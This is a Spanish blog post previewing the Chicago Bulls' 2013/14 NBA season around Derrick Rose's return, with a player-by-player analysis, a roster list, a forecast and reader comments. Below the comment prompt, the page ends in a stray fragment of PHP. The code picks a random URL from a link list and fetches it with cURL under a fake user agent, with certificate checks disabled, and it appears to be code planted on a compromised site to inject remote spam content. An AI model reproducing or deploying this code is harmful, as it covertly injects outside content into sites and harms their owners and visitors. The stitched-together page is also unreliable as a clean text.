Chicago Bulls: The name of the Rose

26 de October de 2013 por TheDeerHunter

#TheReturn. “All in for D Rose”. “The Red Knight Rises”. Una campaña publicitaria preciosa, no cabe duda, e insistente. En ella se nos mostraban fascinantes imágenes de la ciudad de Chicago, donde la realidad parecía suspenderse y las gentes quedaban paralizadas, hundidas, desesperadas, con oscura apariencia zombie… El mundo dejaba de girar porque Derrick Rose caía lesionado y los sueños de campeonato se iban al traste. La música de fondo pretendía imitar el latido de un corazón, que casi se detenía en el infausto momento, y recuperaba poco a poco su ritmo de forma paralela a los esfuerzos del jugador recuperándose, lo cual también parecía sacar a la población de su letargo. El latido se transformaba en el sonido de una locomotora, cuando Rose volvía a vestirse de corto y salía por el túnel de vestuarios, aclamado por la grada. En el último instante se volvía y miraba a cámara, con una semi-sonrisa cómplice, confiada, desafiante. Daba toda la impresión que en la siguiente imagen nos lo iban a mostrar con un anillo de campeón enfundado en el dedo, pero no. Se cortaron.

La campaña molaba, como decimos, pero tenía un par de fallos. Chicago no se quedó en estado de criogenización. Ni mucho menos. Los Bulls mostraron casta rindiendo por encima de lo que, diría, hasta ellos mismos esperaban, haciendo disfrutar al United Center de alguna velada inolvidable con ese espíritu de El Quijote contra los molinos que tanto suele gustar a la gente. El otro fallo es que no llegamos a ver a Rose salir, casi en hombros, hacia la cancha para rematar la faena, pero sí lo vimos marear a base de bien amagando con reaparecer, o simplemente alimentando el hype no sabemos muy bien con qué propósito. Desde luego no fue para ayudar a sus compañeros en plan Mío Cid, sino más bien todo lo contrario. Así terminó por estomagar a propios y extraños con tanta sobreexposición en una temporada donde él no debió de ser nunca protagonista.

El esperado retorno del MVP más joven de la historia ha llegado. En pretemporada, de forma más discreta, natural. Una campaña en blanco y buena parte de la anterior. La potentísima escuadra que se formó en torno suyo recupera a su líder natural. El gran fichaje de los Bulls para la 2013/14, ganando sobre el papel el cartel de candidatos de forma automática. A todo un semifinalista de conferencia, con su columna vertebral esencialmente intacta, se le une un jugador de calibre MVP. Con él nadie debería de echar demasiado de menos a Nate Robinson. Prácticamente lo tienen todo y si atendemos a los resultados en pretemporada habrá que tenerles muy en cuenta para cualquier quiniela.

No vamos a descubrir ahora lo que es capaz de aportar Derrick Rose. En condiciones normales puede ser el base más potente de la liga y uno de los jugadores más explosivos que hayamos visto. Habrá que ver si le pasa factura tanta inactividad y, por supuesto, si es capaz de mantenerse sano hasta la lucha por el anillo. Ocurre algo parecido con su sustituto. Kirk Hinrich, a salvo de lesiones podría ser un guard valiosísimo para este equipo. Un jugador veterano, versátil e inteligente, pero su carrera ha estado excesivamente condicionada por las lesiones. Le beneficia mucho que Rose pueda restarle presencia y responsabilidad, pero como decimos el fondo del problema sigue latente. Marquis Teague no tuvo mucha suerte en su año de rookie, pero ahora parece que se cuenta con él. Se trata de un base rápido y atrevido, con buenas condiciones defensivas.

Una de las sorpresas positivas del curso pasado fue Jimmy Butler. Pasó de ser el intrascendente sustituto de Luol Deng a ser uno de los pilares del equipo. Defensivamente inmenso y ofensivamente ultra-eficaz. Su versatilidad le permite salir como titular de escolta. Su sustituto debería de ser la gran novedad de este verano. Mike Dunleavy es uno de esos jugadores de rol que lo hacen todo bien. Por desgracia tampoco se libra de alarmantes antecedentes de lesiones.

Luol Deng tampoco se libra de incertidumbres. En su caso no es una cuestión de salud, sino de dinero. Anda con la mosca tras la oreja por comenzar sin su renovación bajo el brazo… y bueno, también por el caso Butler que le puede afectar directamente. Es un respetado jugador tanto en ataque como en defensa, pero con una sutil tendencia a dejarse llevar teniendo en cuenta su situación salarial. No nos atrevemos a vaticinar cómo se va a resolver su caso. Además del propio Butler, los Bulls cuentan como alero con el rookie Tony Snell, jugador excesivamente liviano con buena mano, pero que no va a disfrutar de muchos minutos a corto plazo.

Carlos Boozer fue el mejor jugador del equipo el curso pasado, pero aún así no logra convencer del todo a la parroquia. Cierta fama de contrato algo tóxico y cazo mix. Debería de ser el tremendo interior que, en ocasiones, le hemos visto ser y a ese nivel las opciones de título subirían muchísimo. Taj Gibson es un excelente suplente defensivo, aunque ha decepcionado un poco en su desarrollo ofensivo. Por último el rookie Erik Murphy es todo lo contrario y podría ser una opción táctica interesante, aunque previsiblemente jugará muy poco.

En la posición de pívot, Joakim Noah es uno de los jugadores más completos e inteligentes de su posición, especialmente en términos defensivos. Nuevamente su problema es el físico, que no le suele permitir disputar campañas completas. Nazr Mohammed no es precisamente un titán a sus 35 años, pero el año pasado logró un rendimiento extraordinario en ausencia de Noah.

Tim Thibodeau es uno de los mejores técnicos en activo sobre una de las plantillas más potentes de la liga. Los Bulls serán previsiblemente el mejor equipo defensivo, y con mimbres suficientes para hacerlo también bien en ataque. Sólo existen dos cuestiones que sólo podrán resolverse en postemporada. Una es si podrán llegar sanos al momento decisivo y la otra si un equipazo como éste puede ser suficiente para doblegar a los Miami Heat. Lo iremos viendo.

Quinteto inicial: Derrick Rose, Jimmy Butler, Luol Deng, Carlos Boozer, Joakim Noah.
6º hombre: Taj Gibson

Altas: Mike Dunleavy (MIL), Erik Murphy (N), Tony Snell (N).

Bajas: Marco Belinelli (SAS), Daequan Cook, Richard Hamilton, Vladimir Radmanovic, Nate Robinson (DEN), Malcolm Thomas.

Pronóstico: Por encima de 60 victorias. Primeros en el Este. Finalistas de conferencia… como mínimo.

Comenta

8 comentarios a esta entrada

  1. rumbero dice:
    #1

    La preseason de Rose es como para estar esperanzados. A mi me da pánico cada vez que le veo driblando o entrando a canasta la verdad (espero que se me pase pronto) pero lo cierto es que a nivel de velocidad/explosividad se le ve muy bien y ha mejorado su tiro de larga distancia.
    Rose al 90%, Thibs, la progresión de Jimmy Butler, Carlos “soy mejor que Grffin ” Boozer, Noah cojo meándose en Lopez… No los va a querer nadie en PO. Candidatos a todo

      Citar

  2. r_miller dice:
    #2

    Yo creo que este año pueden ganar el campeonato, si consiguen quedar primeros del este y evitan a MIami en semifinales, teniendo en cuenta que lo normal seria que se enfrentaran contra Indiana, si pasaran los Heat quedarian muy desgastados y sino unos pacers tambien exautos por el gran esfuerzo, pero si quedan segundos o terceros es mas dificil creo yo, pero lo tienen todo para ganar el campeonato y personalmente me gustaria. Creo que Rose va a ser MVP.

      Citar

  3. rumbero dice:
    #3

    Gran título para el análisis por cierto

      Citar

  4. Melo15 dice:
    #4

    Yo los veo superiores a Miami y candidatos a todo. Son el mejor equipo en defensa y este año si cuentan con su jugador franquicia¡ que creo que se va a salir este año.
    Tienen una plantilla muy profunda y un entrenador sensacional.

      Citar

  5. Denise dice:
    #5

    Candidatos al anillo, y la 3º opcion del Este con capacidad de meterle mano a cualquiera
    Por dentro, en el Este, solo el trio West-Scola-Hibbert es mejor o igual que el trio Boozer-Noah-Gibson, por lo que desde mi opinión, los Bulls deben imponer su superioridad en la zona ante casi todos los demas equipos, especialmente a Miami al que le puede hacer un roto.
    Por fuera, Rose es Rose y en la preseason se le ve fenomenal y no tengo dudas de que será el jugador que era.
    En el SF, Deng me encanta como jugador y Snell los videos que he visto de él me ha dejado muy buenas sensaciones, por lo que mis dudas con el equipo vienen en el SG. Butler cuajó una extraordinaria temporada pero a mi me tiene que demostrar aun que no es flor de un día. Y Dunleavy, es un buen tirador pero nunca me ha gustado especialmente. Mi sensación es que en el puesto de 2′ le falta algo de polvora al equipo, un tipo con calidad para en un momento determinado romperte un partido, no sé, asi a botepronto, si en vez de Dunleavy hubiesen podido hacerse con OJ Mayo ó con JR Smith en lugar de Dunleavy….

    Y sobre el amigo Boozer, me reafirmo en todo lo que dije en el post de Griffin. Me parece un jugadorazo, un extraordinaria segunda espada que ya veo que en este blog está muy infravalorado…:)

      Citar

  6. Simon dice:
    #6

    Denise:

    Por dentro, en el Este, solo el trio West-Scola-Hibbert es mejor o igual que el trio Boozer-Noah-Gibson, por lo que desde mi opinión, los Bulls deben imponer su superioridad en la zona ante casi todos los demas equipos,

    El trio Lopez, Garnett y Blatche me piden que te mande recuerdos =) =) =)

      Citar

  7. Denise dice:
    #7

    Simon: El trio Lopez, Garnett y Blatche me piden que te mande recuerdos =) =) =)

    jaja, intuia que alguien me lo recordaría.
    Ese trio más Reggie Evans es un completisimo juego interior, pero creo que Noah pararía bastante bien a Lopez, y sobre Garnett tengo mis dudas sobre el nivel que va a mostrar por el pase de los años. El coraje y la mala leche la va a tener pero no estoy seguro que le aguante el fisico. Y Blatche es muy bueno, pero muy desconcertante, juega bien cuando le sale de las pelotas.

      Citar

  8. GreenPride dice:
    #8

    Y vuelve Rose para poner a los Bulls como candidatos al título. Para mí este año el campeón va a salir casi seguro del Este y creo que pueden no ser precisamente los Heat. Buena parte de esas dudas las provoca Chicago. Con Rose recuperado y con mejor tiro exterior (que ya mostró hace dos campañas cuando se lesionó) con Butler haciendo de todo y Deng a buen nivel más Dunleavy y Hinrich aprovechando los espacios tienen un juego exterior de muchos quilates. Si le sumanos a Boozer, Noah y Gibson por dentro y la defensa asfixiante que hacen sin duda son candidatos a todo. Anteriormente les faltó lucidez ofensiva para derrotar a los Heat pero ahora pueden estar preparados para intentarlo con permiso de Pacers y Nets que creo que también tienen equipo para aspirar a todo. Un año impresionante en el Este, que ya tocaba… y los Bulls están llamados a ser uno de sus máximos animadores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>